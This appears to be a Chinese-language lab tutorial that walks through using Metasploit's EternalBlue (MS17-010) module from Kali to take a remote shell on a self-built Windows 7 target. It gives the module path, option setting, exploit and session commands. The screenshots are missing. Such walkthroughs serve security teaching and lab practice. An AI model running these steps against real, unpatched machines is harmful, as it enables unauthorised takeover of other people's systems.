1. 程式人生 > >metasploit 下利用永恒之藍攻擊靶機win7

metasploit 下利用永恒之藍攻擊靶機win7

png arc 攻擊機 直接 參數 windows exploit host 系統

實驗環境:一臺win7靶機,kali作為攻擊機

控制臺下輸入msfconsole

search ms17-010

技術分享圖片

use exploit/windows/smb/ms17_010_eternalblue

技術分享圖片

接下來可以看一下受這個漏洞影響的操作系統

技術分享圖片

可以看出受影響的有兩個,分別是win7和server 2008 R2兩種操作系統(ps:這兩款靶機都可以自己搭建一下,我這裏使用的是win7)

show options 看一下需要設置的參數

技術分享圖片

可以看出我們需要設置RHOST 和RPORT 已經下面兩個required為 yes的參數

技術分享圖片

這裏只需設定一下靶機的IP地址即可,其余的參數默認就好

技術分享圖片

exploit 進行攻擊(-z是為了在成功攻擊目標後暫時不使用控制會話進行交互),也可以直接exploit,直接返回靶機的控制臺,簡單的按CTRL -Z命令將控制會話直接放到後臺運行,我這裏是為了更好地看一下sessions

sessions -l 查看所有的會話

技術分享圖片

sessions -i ID 啟用ID會話

技術分享圖片

接下來就直接進入到win7的控制臺

然後就可以進行下一步的各種操作了

技術分享圖片

metasploit 下利用永恒之藍攻擊靶機win7